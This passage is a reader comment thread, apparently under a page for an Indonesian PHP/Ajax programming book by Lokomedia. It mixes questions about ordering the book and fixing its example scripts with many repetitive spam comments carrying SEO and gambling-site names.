    sya ingin grabbing halaman website airline seperti garuda, merpati dst coz ingin ngambil data jadwal penerbangan... terima kasih

    tolong dibahas via email yah mas lukman
    maksih ^^
    faqieh702@gmail.com

  • poeji | 18 Agustus 2011 - 15:07:31 WIB

    trus maju LOKOMEDIA ^_^

  • ferry | 20 Agustus 2011 - 11:23:41 WIB

    mas lukman, sekali-kali buat buku jquery dengan code igniter ato jquery dengan yii dong... thanks mas. mohon tangapannya

  • anra | 23 Agustus 2011 - 16:58:43 WIB

    tak ada mas lukman. tak ada inspirasi.
    maju terus kang...

  • Van Hire | 25 Agustus 2011 - 06:11:19 WIB

    Saya biasanya tidak posting di Blog tapi blog Anda memaksa saya untuk, bekerja mengagumkan, menakjubkan!

  • Busana Muslim Murah | 29 Agustus 2011 - 12:37:22 WIB

    Maksih artikelnya mantap

  • villa cote d azur | 20 September 2011 - 20:22:08 WIB

    Tolong memberikan informasi cara yang lebih tentang masalah ini?? By the way blog anda luar biasa.

  • pabx panasonic | 28 September 2011 - 08:45:30 WIB

    keren banget nich buku, boleh juga buat nambah2 ilmu.

  • Aritha Handrico | 08 Oktober 2011 - 02:46:42 WIB

    Wah jadi pengen beli...

  • Yellow Page Listings | 13 Oktober 2011 - 14:29:05 WIB

    차라리 다음 Joomla와 학교 홈페이지 워드 프레스를 만들기 쉽게되어 알고 싶어요...

  • link building | 15 Oktober 2011 - 12:43:53 WIB

    Whopper if the author has claimed that it was only the work the authors say, why not have a bibliography, it is important for JG bibliography for readers to learn more

  • kiwi fruit | 15 Oktober 2011 - 17:15:03 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article.

  • Link Building | 15 Oktober 2011 - 18:12:29 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article.

  • car moving | 17 Oktober 2011 - 18:11:21 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article.

  • car shipping compney | 19 Oktober 2011 - 19:09:38 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article. <a href="http://www.vehicleshippingrates.com/">ca r shipping rates</a>

  • motorcycle shipping co | 19 Oktober 2011 - 19:11:11 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article. <a href="http://www.motorcycletransportcompanies.com/&quo t;>motorcycle shipping companies</a>

  • car shipping compney | 19 Oktober 2011 - 19:12:28 WIB

    Hello,to all the visitors of this great site.I read and know all things of this article.Its look like me a great things and idea to know about a very important information.If anyone visit this site,they will be very satisfied to look this article.

  • trade insurance | 21 Oktober 2011 - 10:59:58 WIB

    Sangat terkesan! Semuanya penjelasan yang sangat terbuka dan sangat jelas masalah. Ini benar-benar berisi informasi. Website Anda sangat berguna. Terima kasih untuk berbagi. Looking forward untuk lebih! Besar visualisasi dan artikel informatif yang unik memang.

  • mahwiatul husna | 27 Oktober 2011 - 09:30:38 WIB

    gmna cara pemesanannya yah?

  • mikiwili | 27 Oktober 2011 - 17:27:47 WIB

    hmm kayaknya bukunya bagus nih

  • motorcycle shipping | 27 Oktober 2011 - 18:50:54 WIB

    Sangat terkesan! Semuanya penjelasan yang sangat terbuka dan sangat jelas masalah. Ini benar-benar berisi informasi. Website Anda sangat berguna. Terima kasih untuk berbagi. Looking forward untuk lebih! Besar visualisasi dan artikel informatif yang unik memang.

  • credit card processing | 28 Oktober 2011 - 16:50:05 WIB

    Artikel ini sangat menarik dan ganjaran untuk membaca, terima kasih tuan ..... Pentadbir lagi

  • Fia | 03 November 2011 - 07:47:38 WIB

    Masih ingat dgn fia g pak..yg beli buku membongkar trik n rahasia pra master php punya bapak sendiri n yg bapak kasih tanda tngan waktu itu???hehehe..mkasih y pak da mw ngasih buku pegangan bapak itu...mw tnya pak..Pak buku ini projectnya website berita kan pak???lanjutan dari buku jquery itu kan pak?

  • Adi Nur Fadillah | 09 November 2011 - 02:12:26 WIB

    Sepertinya saya pengagum buku2 terbitan anda pak lukman. Buku2 lokomedia sangat berkualitas dan lebih membuka mata dalam praktek kerja untuk pembuatan proyek2 web. materi2 yang disajikan benar2 apikatif.
    maju terus lokomedia pintarkan anak bangsa

  • Personal loans | 10 November 2011 - 15:33:12 WIB

    Saya pikir ini benar-benar kesempatan besar bagi peserta didik khususnya di Indonesia.I Ajax pasti akan mengatakan bahwa Indonesia sedang berusaha keras untuk melakukan perbaikan terhitung di bidang teknologi jarak jauh.

  • PMP Training | 14 November 2011 - 08:01:28 WIB

    Thank you for the information that you shared about this book. I am really wanted to have this for my class.

  • mesin roti | 14 November 2011 - 16:22:10 WIB

    this book is very important for newbie, you can buy it online, please click at menu "pembelian secara online" at the top of page

    http://toko-muslim.web.id
    http://toko-muslim .web.id
    http://toko-muslim.web.id

  • goal setting | 16 November 2011 - 06:16:01 WIB

    thanks for posting this dude.

  • tiwul instan | 17 November 2011 - 20:18:53 WIB

    menarik sekali gukunya gannn... kapan-kapan beli dah

  • pmp | 05 Desember 2011 - 12:23:31 WIB

    I am glad that I have found this post. Actually, I was looking for this kind of book.

  • equine ulcer treatment | 22 Desember 2011 - 16:54:01 WIB

    Thank you for this book. I was determining to apply this on my site. I am glad that you have shared this in here.

  • iwan | 28 Desember 2011 - 16:53:45 WIB

    mas, skrip tiga comboBox saling berkaitan tidak berhasil,
    gimana solusinya?

  • thesis writing service | 22 Januari 2012 - 13:48:56 WIB

    I am totally agreed with the commenter above me. It’s really unbelievable.

  • teguh | 07 Februari 2012 - 12:11:20 WIB

    pak atau ibu ku mau tanya ..aku kan beli buku trik dashyat dengan ayax .. tapi aku masih bingung pada bagian pembuatan forum ... di cd tutor kan ada database forum tapi gak bisa saya import ...?? apa mungkin punya saya gak ada innoDBnya karena saya menggunakan apache2triad ato ada solusi lain ??? trima kasih

  • write my paper | 02 Maret 2012 - 18:19:32 WIB

    I discovered so many interesting things inside your blog especially its discussion. From all the remarks in your articles.

  • ERY GUNAWAN | 05 Maret 2012 - 11:26:09 WIB

    mas tolong pencerahannya yang di bab 3 untuk file combo3.php ketika di jalankan di browser untuk ongkos kirim ketika penyimpanan tidak tersimpan di database padahal saya sudah mengikuti sesuai dengan buku dan file di cd bawaan buku

  • buy research papers | 06 April 2012 - 23:02:34 WIB

    I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement the concept. Thank you for the post.

  • business plan writing services | 18 April 2012 - 22:25:39 WIB

    Very Useful information, this is both good reading for, have quite a few good key points and I learn some new stuff from it too.

  • 3423423423 | 09 Mei 2012 - 04:37:56 WIB

    32423423423432

  • Ayu Ting Ting | 20 Juli 2012 - 11:41:32 WIB

    artikelnya bagus, informatif dan sangat bermanfaat., terima kasih atas suguhan informasinya...

  • fast custom essays | 23 Juli 2012 - 19:43:26 WIB

    We are learning, too, that the love of beauty is one of Nature's greatest healers.

  • Nazriel umam | 22 Desember 2012 - 08:46:47 WIB

    di toko buku di kota saya gak ada :(
    Gimana mau mesan buku nya yah :)
    saya tertarik sekali dengan buku-buku lokomedia
    ada beberapa buku yang mau saya beli

  • Taruhan Bola | 22 Desember 2012 - 20:39:45 WIB

    di kota saya bukunya kok ga ada juga ya?, tolong bantuannya

  • Judi Online | 22 Desember 2012 - 20:41:39 WIB

    makasih banyak ya bukunya, berguna sekali :)

  • Togel Online | 22 Desember 2012 - 20:42:24 WIB

    gan, bukunya saya rekomendasikan ke orang lain ya soalnya bagus banget hha

  • Taruhan Bola | 22 Desember 2012 - 21:06:28 WIB

    asik nih infonya , makasih banget

  • Taruhan Bola | 22 Desember 2012 - 21:07:26 WIB

    di saya ga ada yang jual bukunya :(

  • Judi Online | 22 Desember 2012 - 21:07:56 WIB

    mantap, makasih dah share bos...

  • Togel Online | 22 Desember 2012 - 21:08:56 WIB

    ini dia yang dicari-cari, makasih bos..

  • yuda | 26 Maret 2013 - 11:57:38 WIB

    mas, saya beli buku ini dan tertarik dengan forumnya, apa tidak ada update dari forumnya mas seperti yang lainnya?

    terima kasih banyak

  • Arif rahman | 05 April 2013 - 00:49:36 WIB

    mas ada buku referensi buat fitur indexing content
    atau buku buat pembuatan e-learning sekolah dengan php
    kalau ada kirim ke e-mail bra_kikuk@yahoo.com
    mohon bantuannya mas

  • Ma'ruf Rahmadi | 07 April 2013 - 19:46:01 WIB

    Saya baru saja membeli buku ini kemaren. pengiriman tepat waktu ke cirebon. senang rasanya saat mulai membaca terutama di poinnya yaitu forum diskusi on line. namun agak sesak ketika webnya tidak berjalan sesuai harapan kayaknya ad setingan xampp yang kurang. masalahnya di $_session[username] nya yg belum aktif jadi di tampilan yang username : root n ketika komen nama kita belum keluar. mohon bantuannya.

  • Ma'ruf Rahmadi | 07 April 2013 - 19:52:50 WIB

    kemudian kan buat topik baru bisa la untuk buat kategori baru gmn ? selain tidaj dibahas di buku dan juga bingung pas nyarinya . .